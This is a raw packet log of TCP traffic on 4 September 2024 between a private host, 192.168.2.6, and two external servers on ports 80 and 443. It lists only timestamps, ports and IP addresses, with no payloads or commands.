Sep 4, 2024 17:37:08.114733934 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.114739895 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.114744902 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.114759922 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.114768982 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.114782095 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.114783049 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.114792109 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.114803076 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.114803076 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.114815950 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.114821911 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.114829063 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.114836931 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.114837885 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.114847898 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.114859104 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.114859104 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.114886999 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.115000963 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.115031958 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.115045071 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.115047932 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.115061045 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.115076065 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.115103960 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.115422010 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.115437031 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.115446091 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.115454912 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.115464926 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.115467072 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.115478039 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.115484953 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.115504980 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.115515947 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.115550041 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.115586042 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.115711927 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.115722895 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.115731955 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.115741968 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.115748882 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.115767002 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.115788937 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.115883112 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.115896940 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.115905046 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.115914106 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.115922928 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.115923882 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.115931988 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.115933895 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.115941048 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.115956068 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.115966082 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.115967035 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.115977049 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.115993023 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.115993023 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.116003990 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.116009951 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.116018057 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.116024971 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.116025925 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.116039991 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.116048098 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.116070986 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.116087914 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.116101027 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.116111994 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.116122961 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.116132021 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.116142988 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.116144896 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.116158009 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.116175890 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.116462946 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.116884947 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.116895914 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.116904020 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.116914034 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.116924047 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.116926908 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.116935015 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.116945982 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.116955996 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.116964102 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.116967916 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.116978884 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.116986036 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.116992950 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.117000103 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.117011070 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.117017984 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.117028952 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.117037058 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.117048979 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.117048979 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.117059946 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.117068052 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.117072105 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.117096901 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.117104053 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.117146969 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.117156982 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.117166042 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.117176056 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.117180109 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.117187977 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.117189884 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.117211103 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.117234945 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.117810965 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.117822886 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.117850065 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.117861986 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.118019104 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.118031979 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.118041992 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.118052959 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.118062019 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.118062019 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.118069887 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.118074894 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.118087053 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.118088961 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.118098021 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.118108988 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.118118048 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.118141890 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.118163109 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.118176937 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.118189096 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.118189096 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.118189096 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.118221045 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.118371964 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.118383884 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.118395090 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.118406057 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.118407011 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.118417978 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.118426085 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.118431091 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.118447065 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.118469954 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.118488073 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.118499994 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.118509054 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.118521929 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.118522882 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.118534088 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.118544102 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.118546963 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.118555069 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.118566990 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.118570089 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.118578911 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.118583918 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.118583918 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.118604898 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.118607998 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.118624926 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.118642092 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.118812084 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.118854046 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.119293928 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.119306087 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.119317055 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.119328022 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.119338036 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.119338036 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.119350910 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.119359016 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.119360924 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.119370937 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.119370937 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.119374037 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.119385004 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.119395018 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.119400978 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.119405031 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.119431973 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.119431973 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.119440079 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.119441986 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.119452953 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.119462967 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.119473934 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.119473934 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.119486094 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.119499922 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.119522095 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.119632959 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.119643927 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.119652987 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.119658947 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.119663954 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.119677067 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.119714975 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.119740009 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.120251894 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.120264053 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.120274067 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.120285034 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.120305061 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.120326042 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.120387077 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.120398045 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.120407104 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.120418072 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.120425940 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.120429993 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.120433092 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.120440960 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.120460033 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.120486021 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.120568037 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.120579958 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.120608091 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.120712042 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.120726109 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.120737076 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.120748043 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.120748997 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.120763063 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.120770931 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.120793104 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.120868921 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.120881081 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.120891094 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.120901108 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.120910883 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.120924950 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.120954037 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.120985031 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.120997906 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.121006966 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.121018887 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.121021986 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.121031046 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.121035099 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.121042967 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.121056080 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.121063948 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.121078968 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.121110916 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.121123075 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.121134996 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.121160030 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.121171951 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.121658087 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.121673107 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.121682882 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.121691942 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.121695042 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.121711969 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.121730089 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.121856928 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.121870041 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.121884108 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.121892929 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.121896982 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.121901035 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.121908903 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.121918917 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.121921062 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.121927977 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.121932983 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.121948004 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.121958017 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.121974945 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.121992111 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.122004986 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.122014046 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.122025013 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.122025013 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.122037888 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.122042894 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.122050047 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.122050047 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.122061968 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.122068882 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.122075081 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.122087002 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.122090101 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.122114897 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.122800112 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.122812986 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.122822046 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.122832060 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.122843027 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.122850895 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.122854948 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.122867107 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.122876883 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.122878075 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.122876883 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.122876883 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.122890949 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.122900009 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.122901917 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.122911930 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.122921944 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.122931957 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.122931957 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.122945070 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.122973919 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.123119116 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.123131037 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.123141050 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.123162031 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.123187065 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.123245955 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.123259068 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.123267889 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.123284101 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.123294115 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.123311043 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.123440981 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.123452902 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.123461962 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.123472929 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.123481035 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.123481989 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.123493910 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.123503923 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.123505116 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.123505116 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.123513937 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.123516083 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.123528004 CEST	80	49719	147.45.44.104	192.168.2.6
